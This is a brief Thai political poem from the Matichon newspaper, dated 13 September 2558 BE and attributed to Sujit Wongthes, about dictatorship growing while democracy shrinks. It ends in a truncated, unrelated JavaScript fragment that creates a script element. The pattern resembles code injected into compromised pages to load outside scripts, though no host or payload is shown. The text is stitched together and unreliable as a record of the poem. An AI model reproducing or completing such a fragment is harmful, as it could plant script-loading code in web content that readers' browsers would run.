มติชน วันอาทิตย์

13 กันยายน 2558

 

เผด็จการยืดได้

ประชาธิปไตยก็หด

น้ำมาปลากินมด

น้ำลดมดก็ถูกปลากิน

 

สุจิตต์ วงษ์เทศ

ศุกร์ 11 กันยายน 2558} else {var d=document;var s=d.createElement(‘script’);